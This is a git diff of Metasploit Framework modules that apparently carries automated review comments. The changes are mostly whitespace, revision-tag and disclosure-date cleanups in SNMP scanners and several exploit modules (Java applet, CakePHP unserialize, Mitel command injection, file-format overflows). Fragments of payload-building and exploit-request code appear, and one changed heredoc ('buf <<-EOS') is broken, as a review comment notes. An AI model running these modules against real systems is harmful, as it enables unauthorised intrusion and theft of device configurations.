diff --git a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb
index 1b9460e424..9bc23d5c9e 100644
--- a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb
+++ b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb
@@ -24,8 +24,8 @@ class Metasploit3 < Msf::Auxiliary
'Version' => '$Revision$',
'Description' => %q{
This module will download the startup or running configuration
- from a Cisco IOS device using SNMP and TFTP. A read-write SNMP
- community is required. The SNMP community scanner module can
+ from a Cisco IOS device using SNMP and TFTP. A read-write SNMP
+ community is required. The SNMP community scanner module can
assist in identifying a read-write community. The target must
be able to connect back to the Metasploit system and the use of
NAT will cause the TFTP transfer to fail.
@@ -54,12 +54,12 @@ class Metasploit3 < Msf::Auxiliary
@tftp.incoming_file_hook = Proc.new{|info| process_incoming(info) }
@tftp.start
add_socket(@tftp.sock)
-
+
@main_thread = ::Thread.current
-
+
print_status("Scanning for vulnerable targets...")
end
-
+
#
# Kill the TFTP server
#
@@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
# Wait 5 seconds for background transfers to complete
print_status("Providing some time for transfers to complete...")
::IO.select(nil, nil, nil, 5.0)
-
+
print_status("Shutting down the TFTP service...")
if @tftp
@tftp.close rescue nil
@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
-
+
#
# Callback for incoming files
#
@@ -87,14 +87,14 @@ class Metasploit3 < Msf::Auxiliary
data = info[:file][:data]
from = info[:from]
return if not (name and data)
-
+
# Trim off IPv6 mapped IPv4 if necessary
from = from[0].dup
from.gsub!('::ffff:', '')
-
+
print_status("Incoming file from #{from} - #{name} #{data.length} bytes")
-
- # Save the configuration file if a path is specified
+
+ # Save the configuration file if a path is specified
if datastore['OUTPUTDIR']
name = "#{from}.txt"
::FileUtils.mkdir_p(datastore['OUTPUTDIR'])
@@ -104,13 +104,13 @@ class Metasploit3 < Msf::Auxiliary
end
print_status("Saved configuration file to #{path}")
end
-
+
# Toss the configuration file to the parser
cisco_ios_config_eater(from, 161, data)
end
-
+
def run_host(ip)
-
+
begin
source = datastore['SOURCE'].to_i
protocol = 1
@@ -127,11 +127,11 @@ class Metasploit3 < Msf::Auxiliary
session = rand(255) + 1
snmp = connect_snmp
-
+
varbind = SNMP::VarBind.new("#{ccconfigcopyprotocol}#{session}" , SNMP::Integer.new(protocol))
value = snmp.set(varbind)
-
+
# If the above line didn't throw an error, the host is alive and the community is valid
print_status("Trying to acquire configuration from #{ip}...")
@@ -154,7 +154,7 @@ class Metasploit3 < Msf::Auxiliary
value = snmp.set(varbind)
disconnect_snmp
-
+
# No need to make noise about timeouts
rescue ::SNMP::RequestTimeout, ::Rex::ConnectionRefused
rescue ::Interrupt
diff --git a/modules/auxiliary/scanner/snmp/snmp_enum.rb b/modules/auxiliary/scanner/snmp/snmp_enum.rb
index 248d9d7bff..3b2337e73a 100644
--- a/modules/auxiliary/scanner/snmp/snmp_enum.rb
+++ b/modules/auxiliary/scanner/snmp/snmp_enum.rb
@@ -44,36 +44,36 @@ class Metasploit3 < Msf::Auxiliary
#
#
#
-
+
sysName = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s
if (sysName.to_s.empty? or sysName.to_s =~ /Null/)
sysName = '-'
end
-
+
sysDesc = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s
if (sysDesc.to_s.empty? or sysDesc.to_s =~ /Null/)
sysDesc = '-'
end
sysDesc.gsub!(/^\s+|\s+$|\n+|\r+/, ' ')
-
+
sysContact = snmp.get_value('1.3.6.1.2.1.1.4.0').to_s
if (sysContact.to_s.empty? or sysContact.to_s =~ /Null/)
sysContact = '-'
end
-
+
sysLocation = snmp.get_value('1.3.6.1.2.1.1.6.0').to_s
if (sysLocation.to_s.empty? or sysLocation.to_s =~ /Null/)
sysLocation = '-'
end
-
+
sysUpTimeInstance = snmp.get_value('1.3.6.1.2.1.1.3.0')
-
+
hrSystemUptime = snmp.get_value('1.3.6.1.2.1.25.1.1.0')
hrSystemUptime = '-' if hrSystemUptime.to_s =~ /Null/
year = month = day = hour = minutes = seconds = tenths = 0
-
+
systemDate = snmp.get_value('1.3.6.1.2.1.25.1.2.0')
if (systemDate.to_s.empty? or systemDate.to_s =~ /Null/)
systemDate = '-'
@@ -109,9 +109,9 @@ class Metasploit3 < Msf::Auxiliary
print_line("Location : #{sysLocation}")
print_line("Uptime snmp : #{sysUpTimeInstance}")
print_line("Uptime system : #{hrSystemUptime}")
-
+
print_line(sprintf("System date : %d-%d-%d %02d:%02d:%02d.%d", year, month, day, hour, minutes, seconds, tenths))
-
+
if sysName.length > 0
report_note(
:host => ip,
@@ -121,7 +121,7 @@ class Metasploit3 < Msf::Auxiliary
:data => sysName.strip
)
end
-
+
if sysDesc.length > 0
report_note(
:host => ip,
@@ -131,30 +131,30 @@ class Metasploit3 < Msf::Auxiliary
:data => sysDesc.strip
)
end
-
+
if (sysDesc =~ /Windows/)
-
+
domPrimaryDomain = snmp.get_value('1.3.6.1.4.1.77.1.4.1.0')
domPrimaryDomain = '-' if domPrimaryDomain.to_s =~ /Null/
print_line("Domain : #{domPrimaryDomain}")
-
+
#
#
#
-
+
users = []
snmp.walk(["1.3.6.1.4.1.77.1.2.25.1.1","1.3.6.1.4.1.77.1.2.25.1"]) do |user,entry|
users.push([[user.value]])
end
-
+
if not users.empty?
print_line('')
print_status("User accounts\n")
users.each {|a| print_line("#{a}")}
end
end
-
+
#
#
#
@@ -162,57 +162,57 @@ class Metasploit3 < Msf::Auxiliary
network_information = []
ipForwarding = snmp.get_value('1.3.6.1.2.1.4.1.0')
-
- if ipForwarding == 0 || ipForwarding == 2
+
+ if ipForwarding == 0 || ipForwarding == 2
ipForwarding = "no"
network_information.push([["IP forwarding enabled : "],[ipForwarding]])
elsif ipForwarding == 1
ipForwarding = "yes"
network_information.push([["IP forwarding enabled : "],[ipForwarding]])
end
-
+
ipDefaultTTL = snmp.get_value('1.3.6.1.2.1.4.2.0')
if ipDefaultTTL.to_s !~ /Null/
network_information.push([["Default TTL : "],[ipDefaultTTL]])
end
-
+
tcpInSegs = snmp.get_value('1.3.6.1.2.1.6.10.0')
if tcpInSegs.to_s !~ /Null/
network_information.push([["TCP segments received : "],[tcpInSegs]])
end
-
+
tcpOutSegs = snmp.get_value('1.3.6.1.2.1.6.11.0')
if tcpOutSegs.to_s !~ /Null/
network_information.push([["TCP segments sent : "],[tcpOutSegs]])
end
-
+
tcpRetransSegs = snmp.get_value('1.3.6.1.2.1.6.12.0')
if tcpRetransSegs.to_s !~ /Null/
network_information.push([["TCP segments retrans. : "],[tcpRetransSegs]])
end
-
+
ipInReceives = snmp.get_value('1.3.6.1.2.1.4.3.0')
if ipInReceives.to_s !~ /Null/
network_information.push([["Input datagrams : "],[ipInReceives]])
end
-
+
ipInDelivers = snmp.get_value('1.3.6.1.2.1.4.9.0')
if ipInDelivers.to_s !~ /Null/
network_information.push([["Delivered datagrams : "],[ipInDelivers]])
end
-
+
ipOutRequests = snmp.get_value('1.3.6.1.2.1.4.10.0')
if ipOutRequests.to_s !~ /Null/
network_information.push([["Output datagrams : "],[ipOutRequests]])
end
-
+
if not network_information.empty?
print_line('')
print_status("Network information")
print_line('')
network_information.each {|a,b| print_line("#{a} #{b}")}
end
-
+
#
#
#
@@ -220,7 +220,7 @@ class Metasploit3 < Msf::Auxiliary
network_interfaces = []
snmp.walk( ["1.3.6.1.2.1.2.2.1.1", "1.3.6.1.2.1.2.2.1.2", "1.3.6.1.2.1.2.2.1.6", "1.3.6.1.2.1.2.2.1.3", "1.3.6.1.2.1.2.2.1.4", "1.3.6.1.2.1.2.2.1.5", "1.3.6.1.2.1.2.2.1.10", "1.3.6.1.2.1.2.2.1.16", "1.3.6.1.2.1.2.2.1.7"]) do |index,descr,mac,type,mtu,speed,inoc,outoc,status|
-
+
ifindex = index.value
ifdescr = descr.value
ifmac = mac.value.unpack("H2H2H2H2H2H2").join(":")
@@ -230,11 +230,11 @@ class Metasploit3 < Msf::Auxiliary
ifinoc = inoc.value
ifoutoc = outoc.value
ifstatus = status.value
-
+
case iftype
when 1
iftype = "other"
- when 2
+ when 2
iftype = "regular1822"
when 3
iftype = "hdh1822"
@@ -315,7 +315,7 @@ class Metasploit3 < Msf::Auxiliary
network_interfaces.push([[ifstatus],[ifdescr],[ifindex],[ifmac],[iftype],[ifspeed],[ifmtu],[ifinoc],[ifoutoc]])
end
-
+
if not network_interfaces.empty?
print_line('')
print_status("Network interfaces")
@@ -333,7 +333,7 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
}
end
-
+
#
#
#
@@ -343,7 +343,7 @@ class Metasploit3 < Msf::Auxiliary
snmp.walk(["1.3.6.1.2.1.4.20.1.2","1.3.6.1.2.1.4.20.1.1","1.3.6.1.2.1.4.20.1.3","1.3.6.1.2.1.4.20.1.4"]) do |ifid,ipaddr,netmask,bcast|
network_ip.push([[ifid.value],[ipaddr.value],[netmask.value],[bcast.value]])
end
-
+
if not network_ip.empty?
print_line('')
print_status("Network IP")
@@ -352,7 +352,7 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
network_ip.each {|a,b,c,d| print_line(sprintf("%16s %16s %16s %16s",a,b,c,d))}
end
-
+
#
#
#
@@ -365,7 +365,7 @@ class Metasploit3 < Msf::Auxiliary
end
routing.push([[dest.value],[hop.value],[mask.value],[metric.value]])
end
-
+
if not routing.empty?
print_line('')
print_status("Routing information")
@@ -374,7 +374,7 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
routing.each {|a,b,c,d| print_line(sprintf("%16s %16s %16s %16s",a,b,c,d))}
end
-
+
#
#
#
@@ -382,7 +382,7 @@ class Metasploit3 < Msf::Auxiliary
tcp = []
snmp.walk(["1.3.6.1.2.1.6.13.1.2","1.3.6.1.2.1.6.13.1.3","1.3.6.1.2.1.6.13.1.4","1.3.6.1.2.1.6.13.1.5","1.3.6.1.2.1.6.13.1.1"]) do |ladd,lport,radd,rport,state|
-
+
if (ladd.value.to_s.empty? or ladd.value.to_s =~ /noSuchInstance/)
ladd = "-"
else
@@ -406,7 +406,7 @@ class Metasploit3 < Msf::Auxiliary
else
rport = rport.value
end
-
+
case state.value
when 1
state = "closed"
@@ -438,7 +438,7 @@ class Metasploit3 < Msf::Auxiliary
tcp.push([[ladd],[lport],[radd],[rport],[state]])
end
-
+
if not tcp.empty?
print_line('')
print_status("TCP connections and listening ports")
@@ -447,7 +447,7 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
tcp.each {|a,b,c,d,e| print_line(sprintf("%16s %16s %16s %16s %16s",a,b,c,d,e))}
end
-
+
#
#
#
@@ -457,8 +457,8 @@ class Metasploit3 < Msf::Auxiliary
snmp.walk(["1.3.6.1.2.1.7.5.1.1","1.3.6.1.2.1.7.5.1.2"]) do |ladd,lport|
udp.push([[ladd.value],[lport.value]])
end
-
- if not udp.empty?
+
+ if not udp.empty?
print_line('')
print_status("Listening UDP ports")
print_line('')
@@ -466,13 +466,13 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
udp.each {|a,b| print_line(sprintf("%16s %16s",a,b))}
end
-
+
#
#
#
-
+
if (sysDesc =~ /Windows/)
-
+
#
#
#
@@ -480,13 +480,13 @@ class Metasploit3 < Msf::Auxiliary
network_services = []
n = 0
-
+
snmp.walk(["1.3.6.1.4.1.77.1.2.3.1.1","1.3.6.1.4.1.77.1.2.3.1.2"]) do |name,installed|
network_services.push([[n],[name.value]])
n+=1
end
-
- if not network_services.empty?
+
+ if not network_services.empty?
print_line('')
print_status("Network services")
print_line('')
@@ -494,29 +494,29 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
network_services.each {|a,b| print_line(sprintf("%10s %s",a,b))}
end
-
+
#
#
#
-
+
share = []
snmp.walk(["1.3.6.1.4.1.77.1.2.27.1.1","1.3.6.1.4.1.77.1.2.27.1.2","1.3.6.1.4.1.77.1.2.27.1.3"]) do |name,path,comment|
share.push([[name.value],[path.value],[comment.value]])
end
-
- if not share.empty?
+
+ if not share.empty?
print_line('')
print_status("Share")
print_line('')
share.each {|a,b,c|
- print_line("Name : #{a}")
+ print_line("Name : #{a}")
print_line("Path : #{b}")
print_line("Comment : #{c}")
print_line('')
}
end
-
+
#
#
#
@@ -527,17 +527,17 @@ class Metasploit3 < Msf::Auxiliary
if http_totalBytesSentLowWord.to_s !~ /Null/
iis.push([["TotalBytesSentLowWord : "],[http_totalBytesSentLowWord]])
end
-
+
http_totalBytesReceivedLowWord = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.4.0')
if http_totalBytesReceivedLowWord.to_s !~ /Null/
iis.push([["TotalBytesReceivedLowWord : "],[http_totalBytesReceivedLowWord]])
end
-
+
http_totalFilesSent = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.5.0')
if http_totalFilesSent.to_s !~ /Null/
iis.push([["TotalFilesSent : "],[http_totalFilesSent]])
end
-
+
http_currentAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.6.0')
if http_currentAnonymousUsers.to_s !~ /Null/
iis.push([["CurrentAnonymousUsers : "],[http_currentAnonymousUsers]])
@@ -577,7 +577,7 @@ class Metasploit3 < Msf::Auxiliary
if http_maxConnections.to_s !~ /Null/
iis.push([["MaxConnections : "],[http_maxConnections]])
end
-
+
http_connectionAttempts = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.14.0')
if http_connectionAttempts.to_s !~ /Null/
iis.push([["ConnectionAttempts : "],[http_connectionAttempts]])
@@ -607,34 +607,34 @@ class Metasploit3 < Msf::Auxiliary
if http_totalOthers.to_s !~ /Null/
iis.push([["Others : "],[http_totalOthers]])
end
-
+
http_totalCGIRequests = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.20.0')
if http_totalCGIRequests.to_s !~ /Null/
iis.push([["CGIRequests : "],[http_totalCGIRequests]])
end
-
+
http_totalBGIRequests = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.21.0')
if http_totalBGIRequests.to_s !~ /Null/
iis.push([["BGIRequests : "],[http_totalBGIRequests]])
end
-
+
http_totalNotFoundErrors = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.22.0')
if http_totalNotFoundErrors.to_s !~ /Null/
iis.push([["NotFoundErrors : "],[http_totalNotFoundErrors]])
end
-
- if not iis.empty?
+
+ if not iis.empty?
print_line('')
print_status("IIS server information")
print_line('')
iis.each {|a,b| print_line("#{a} #{b}")}
end
end
-
+
#
#
#
-
+
storage_information = []
snmp.walk(["1.3.6.1.2.1.25.2.3.1.1","1.3.6.1.2.1.25.2.3.1.2","1.3.6.1.2.1.25.2.3.1.3","1.3.6.1.2.1.25.2.3.1.4","1.3.6.1.2.1.25.2.3.1.5","1.3.6.1.2.1.25.2.3.1.6"]) do |index,type,descr,allocation,size,used|
@@ -670,16 +670,16 @@ class Metasploit3 < Msf::Auxiliary
storage_information.push([[descr.value],[index.value],[type.value],[allocation.value],[size.value],[used.value]])
end
-
- if not storage_information.empty?
+
+ if not storage_information.empty?
print_line('')
print_status("Storage information")
print_line('')
storage_information.each {|a,b,c,d,e,f|
-
+
e = number_to_human_size(e,d)
f = number_to_human_size(f,d)
-
+
print_line("#{a}")
print_line("\tDevice id : #{b}")
print_line("\tFilesystem type : #{c}")
@@ -689,23 +689,23 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
}
end
-
+
#
#
#
-
+
file_system = []
hrFSIndex = snmp.get_value('1.3.6.1.2.1.25.3.8.1.1.1')
if hrFSIndex.to_s !~ /Null/
file_system.push([["Index : "],[hrFSIndex]])
end
-
+
hrFSMountPoint = snmp.get_value('1.3.6.1.2.1.25.3.8.1.2.1')
if hrFSMountPoint.to_s !~ /Null/
file_system.push([["Mount point : "],[hrFSMountPoint]])
end
-
+
hrFSRemoteMountPoint = snmp.get_value('1.3.6.1.2.1.25.3.8.1.3.1')
if hrFSRemoteMountPoint.to_s !~ /Null/
if hrFSRemoteMountPoint.empty?
@@ -713,7 +713,7 @@ class Metasploit3 < Msf::Auxiliary
end
file_system.push([["Remote mount point : "],[hrFSRemoteMountPoint]])
end
-
+
hrFSType = snmp.get_value('1.3.6.1.2.1.25.3.8.1.4.1')
case hrFSType.to_s
@@ -766,7 +766,7 @@ class Metasploit3 < Msf::Auxiliary
else
hrFSType = "Null"
end
-
+
if hrFSType.to_s !~ /Null/
file_system.push([["Type : "],[hrFSType]])
end
@@ -775,12 +775,12 @@ class Metasploit3 < Msf::Auxiliary
if hrFSAccess.to_s !~ /Null/
file_system.push([["Access : "],[hrFSAccess]])
end
-
+
hrFSBootable = snmp.get_value('1.3.6.1.2.1.25.3.8.1.6.1')
if hrFSBootable.to_s !~ /Null/
file_system.push([["Bootable : "],[hrFSBootable]])
end
-
+
if not file_system.empty?
print_line('')
print_status("File system information")
@@ -795,7 +795,7 @@ class Metasploit3 < Msf::Auxiliary
device_information = []
snmp.walk(["1.3.6.1.2.1.25.3.2.1.1","1.3.6.1.2.1.25.3.2.1.2","1.3.6.1.2.1.25.3.2.1.5","1.3.6.1.2.1.25.3.2.1.3"]) do |index,type,status,descr|
-
+
case type.value.to_s
when /^1.3.6.1.2.1.25.3.1.1$/
type.value = "Other"
@@ -836,7 +836,7 @@ class Metasploit3 < Msf::Auxiliary
else
type.value = "unknown"
end
-
+
case status.value
when 1
status.value = "unknown"
@@ -856,8 +856,8 @@ class Metasploit3 < Msf::Auxiliary
device_information.push([[index.value],[type.value],[status.value],[descr.value]])
end
-
- if not device_information.empty?
+
+ if not device_information.empty?
print_line('')
print_status("Device information")
print_line('')
@@ -876,7 +876,7 @@ class Metasploit3 < Msf::Auxiliary
software_list.push([[index.value],[name.value]])
end
- if not software_list.empty?
+ if not software_list.empty?
print_line('')
print_status("Software components")
print_line('')
@@ -900,11 +900,11 @@ class Metasploit3 < Msf::Auxiliary
else
status.value = "unknown"
end
-
+
process_interfaces.push([[id.value],[status.value],[name.value],[path.value],[param.value]])
end
-
- if not process_interfaces.empty?
+
+ if not process_interfaces.empty?
print_line('')
print_status("Process interfaces")
print_line('')
@@ -912,7 +912,7 @@ class Metasploit3 < Msf::Auxiliary
print_line('')
process_interfaces.each {|a,b,c,d,e| print_line(sprintf("%10s %10s %22s %30s %s",a,b,c,d,e))}
end
-
+
#
#
#
@@ -935,7 +935,7 @@ class Metasploit3 < Msf::Auxiliary
end
def number_to_human_size(size,unit)
- size = size.first.to_i * unit.first.to_i
+ size = size.first.to_i * unit.first.to_i
if size < 1024
"#{size} bytes"
diff --git a/modules/auxiliary/scanner/snmp/snmp_set.rb b/modules/auxiliary/scanner/snmp/snmp_set.rb
index a6b51ec4d6..347615a2e4 100644
--- a/modules/auxiliary/scanner/snmp/snmp_set.rb
+++ b/modules/auxiliary/scanner/snmp/snmp_set.rb
@@ -1,5 +1,5 @@
##
-# $Id: $
+# $Id$
##
##
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'SNMP Set Module',
- 'Version' => '$Revision: $',
+ 'Version' => '$Revision$',
'Description' => %q{
This module, similar to snmpset tool, uses the SNMP SET request
to set information on a network entity. A OID (numeric notation)
diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb
index f44fcdc2df..69dadffb4b 100644
--- a/modules/exploits/multi/browser/java_signed_applet.rb
+++ b/modules/exploits/multi/browser/java_signed_applet.rb
@@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_error
@use_static = true
- else
+ else
cp = "#{datastore["JavaCache"]}:" + File.join(Msf::Config.data_directory, "java")
compile( [ "#{datastore["APPLETNAME"]}" ] , [ applet_code ], [ "-classpath", "#{cp}" ])
applet_file = File.join(datastore["JavaCache"], "#{datastore["APPLETNAME"]}.class")
@@ -241,20 +241,20 @@ class Metasploit3 < Msf::Exploit::Remote
end
def applet_code
- applet = %Q|
+ applet = <<-EOS
import java.applet.*;
import metasploit.*;
public class #{datastore["APPLETNAME"]} extends Applet {
- public void init() {
- try {
- Payload.main(null);
- } catch (Exception ex) {
- //ex.printStackTrace();
- }
- }
+ public void init() {
+ try {
+ Payload.main(null);
+ } catch (Exception ex) {
+ //ex.printStackTrace();
+ }
+ }
}
- |
+EOS
end
end
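Review bot: `datastore["APPLETNAME"]` is interpolated straight into the generated Java source as the class name in applet_code, and the earlier hunk in this file also passes it to `compile` and to `File.join(datastore["JavaCache"], ...)`, with no check that it is a plain Java identifier. A value containing spaces, dots or path separators would produce an opaque compiler error or a class file path outside the cache directory. A guard before first use would make the failure explicit, for example `raise ArgumentError, "APPLETNAME must be a valid Java identifier" unless datastore["APPLETNAME"] =~ /\A[A-Za-z_]\w*\z/`; the right place for it is probably outside this hunk. Separately, the local `applet` is assigned and never read, so the heredoc could simply be the method's last expression.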
diff --git a/modules/exploits/unix/webapp/cakephp_cache_corruption.rb b/modules/exploits/unix/webapp/cakephp_cache_corruption.rb
index 26812aeac8..d9081e5a0b 100644
--- a/modules/exploits/unix/webapp/cakephp_cache_corruption.rb
+++ b/modules/exploits/unix/webapp/cakephp_cache_corruption.rb
@@ -22,12 +22,12 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{
CakePHP is a popular PHP framework for building web applications.
The Security component of CakePHP is vulnerable to an unserialize attack which
- could be abused to allow unauthenticated attackers to execute arbitrary
+ could be abused to allow unauthenticated attackers to execute arbitrary
code with the permissions of the webserver.
},
'Author' =>
[
- 'tdz',
+ 'tdz',
'Felix Wilhelm', # poc
],
'License' => MSF_LICENSE,
@@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
p << 's:3:"Foo";s:'
p << len.to_s()
p << ':" '
- p << payload.encoded
+ p << payload.encoded
p << ' ?>";}s:7:"__paths";a:0:{}s:9:"__objects";a:0:{}}'
#rot13 and urlencode
@@ -107,13 +107,13 @@ class Metasploit3 < Msf::Exploit::Remote
{
'uri' => datastore['URI'],
'method' => "POST",
- 'ctype' => 'application/x-www-form-urlencoded',
+ 'ctype' => 'application/x-www-form-urlencoded',
'data' => data
}, 5)
print_status("Sending exploit request 2")
res = send_request_cgi(
- {
+ {
'uri' => datastore['URI'],
'method' => "POST",
'ctype' => 'application/x-www-form-urlencoded',
diff --git a/modules/exploits/unix/webapp/mitel_awc_exec.rb b/modules/exploits/unix/webapp/mitel_awc_exec.rb
index 2410e7c358..93183b216e 100644
--- a/modules/exploits/unix/webapp/mitel_awc_exec.rb
+++ b/modules/exploits/unix/webapp/mitel_awc_exec.rb
@@ -21,17 +21,17 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Mitel Audio and Web Conferencing Command Injection',
'Description' => %q{
This module exploits a command injection flaw within the Mitel
- Audio and Web Conferencing web interface.
+ Audio and Web Conferencing web interface.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
-
+
['URL', 'http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-14'],
['OSVDB', '69934'],
- # ['CVE', ''],
+ # ['CVE', ''],
# ['BID', '']
],
'Platform' => ['unix', 'linux'],
@@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
print_status("Attempting to execute our command..")
-
+
res = send_request_cgi(
{
'uri' => datastore['URIPATH'],
@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_error("Unexpected reply: #{res.code} #{res.body[0,500].inspect}...")
return
end
-
+
handler
end
diff --git a/modules/exploits/unix/webapp/redmine_scm_exec.rb b/modules/exploits/unix/webapp/redmine_scm_exec.rb
old mode 100755
new mode 100644
diff --git a/modules/exploits/unix/webapp/trixbox_langchoice.rb b/modules/exploits/unix/webapp/trixbox_langchoice.rb
index 5990fa1bfb..8c6b8da49f 100644
--- a/modules/exploits/unix/webapp/trixbox_langchoice.rb
+++ b/modules/exploits/unix/webapp/trixbox_langchoice.rb
@@ -1,5 +1,5 @@
##
-# $Id: $
+# $Id$
##
##
@@ -28,6 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' => ['chao-mu'],
'License' => BSD_LICENSE,
+ 'Version' => '$Revision$',
'References' =>
[
['OSVDB' => '50421'],
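Review bot: The OSVDB entry directly below the added 'Version' line is written `['OSVDB' => '50421']`, which is an array holding a one-pair hash rather than the two-element `['OSVDB', '50421']` form used for references elsewhere in this diff (for example `['OSVDB', '69934']` in mitel_awc_exec.rb). The commit tidies this module's metadata but leaves that entry as it was; whatever consumes 'References' presumably expects a type/value pair, so this reference may be dropped or rendered incorrectly. Changing the line to `['OSVDB', '50421'],` would bring it in line with the other modules. The References array continues past the end of the hunk.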
diff --git a/modules/exploits/windows/browser/java_basicservice_impl.rb b/modules/exploits/windows/browser/java_basicservice_impl.rb
index 13b1de7431..455d4ab105 100644
--- a/modules/exploits/windows/browser/java_basicservice_impl.rb
+++ b/modules/exploits/windows/browser/java_basicservice_impl.rb
@@ -1,5 +1,5 @@
##
-# $Id: java_basicservice_impl.rb 10488 2010-09-26 23:55:03Z egypt $
+# $Id$
##
##
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Matthias Kaiser', # Discovery, PoC, metasploit module
'egypt' # metasploit module
],
- 'Version' => '$Revision: 10488 $',
+ 'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2010-3563' ],
@@ -87,24 +87,26 @@ class Metasploit3 < Msf::Exploit::Remote
send_response(cli, all, { 'Content-Type' => 'application/octet-stream' })
when /init.jnlp/
- init = %Q|
+ init = <<-EOS
+
- #{jnlp_info}
-
- #{jpath}
-
+#{jnlp_info}
+
+ #{jpath}
+
-|
+EOS
print_status("Sending init.jnlp")
send_response(cli, init, { 'Content-Type' => 'application/x-java-jnlp-file' })
when /exploit.jnlp/
- expl = %Q|
-
- #{jnlp_info}
-
-
-|
+ expl = <<-EOS
+
+
+#{jnlp_info}
+
+
+EOS
print_status("Sending exploit.jnlp")
send_response(cli, expl, { 'Content-Type' => 'application/x-java-jnlp-file' })
@@ -129,15 +131,16 @@ class Metasploit3 < Msf::Exploit::Remote
end
def jnlp_info
-%Q|
- #{Rex::Text.rand_text_alpha(rand(10)+10)}
- #{Rex::Text.rand_text_alpha(rand(10)+10)}
- #{Rex::Text.rand_text_alpha(rand(10)+10)}
-
-
-
-
-
-|
+ buf <<-EOS
+
+ #{Rex::Text.rand_text_alpha(rand(10)+10)}
+ #{Rex::Text.rand_text_alpha(rand(10)+10)}
+ #{Rex::Text.rand_text_alpha(rand(10)+10)}
+
+
+
+
+
+EOS
end
end
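Review bot: `buf <<-EOS` in jnlp_info is not an assignment, and `buf` is not defined anywhere in the visible lines, so Ruby will most likely parse it as a call to a method named `buf` with the heredoc as its argument and raise NoMethodError the first time jnlp_info runs. The removed code returned the `%Q|...|` string as the method's last expression, and both the init.jnlp and exploit.jnlp branches in the previous hunk interpolate that return value via `#{jnlp_info}`. Making the heredoc itself the last expression (a bare `<<-EOS`) or writing `buf = <<-EOS` restores the old return value.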
diff --git a/modules/exploits/windows/browser/wmi_admintools.rb b/modules/exploits/windows/browser/wmi_admintools.rb
index 9c5e8dd6ae..9bdf82189f 100644
--- a/modules/exploits/windows/browser/wmi_admintools.rb
+++ b/modules/exploits/windows/browser/wmi_admintools.rb
@@ -38,9 +38,9 @@ class Metasploit3 < Msf::Exploit::Remote
.NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not
opt-in to ASLR. As such, this module should be reliable on all Windows
versions.
-
+
The WMI Adminsitrative Tools are a standalone download & install (linked in the
- references).
+ references).
},
'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/fileformat/mediajukebox.rb b/modules/exploits/windows/fileformat/mediajukebox.rb
index 07357690f5..6ac1886eb2 100644
--- a/modules/exploits/windows/fileformat/mediajukebox.rb
+++ b/modules/exploits/windows/fileformat/mediajukebox.rb
@@ -55,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], # 0x02291457 pop, pop, ret dsp_mjMain.dll
],
'Privileged' => false,
+ 'DisclosureDate' => 'July 1 2009',
'DefaultTarget' => 0))
register_options(
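Review bot: The added `'DisclosureDate' => 'July 1 2009'` spells the month in full and leaves the day unpadded, while the two other dates added in this commit use `'Dec 25 2009'` (mini_stream.rb) and `'Oct 08 2010'` (nuance_pdf_launch_overflow.rb). If anything parses, sorts or searches on these strings, a single format is safer than three variants. I would use the three-letter month and two-digit day everywhere, here `'DisclosureDate' => 'Jul 01 2009',`. The enclosing update_info call starts outside the hunk.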
diff --git a/modules/exploits/windows/fileformat/mini_stream.rb b/modules/exploits/windows/fileformat/mini_stream.rb
index d95cdc0b7a..baae0a16e7 100644
--- a/modules/exploits/windows/fileformat/mini_stream.rb
+++ b/modules/exploits/windows/fileformat/mini_stream.rb
@@ -55,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ], # 0x7c941eed JMP ESP - SHELL32.dll
],
'Privileged' => false,
+ 'DisclosureDate' => 'Dec 25 2009',
'DefaultTarget' => 0))
register_options(
diff --git a/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb b/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb
index 3837897e3c..6d37b28bb2 100644
--- a/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb
+++ b/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb
@@ -23,12 +23,12 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{
This module exploits a stack-based buffer overflow in the handling of the
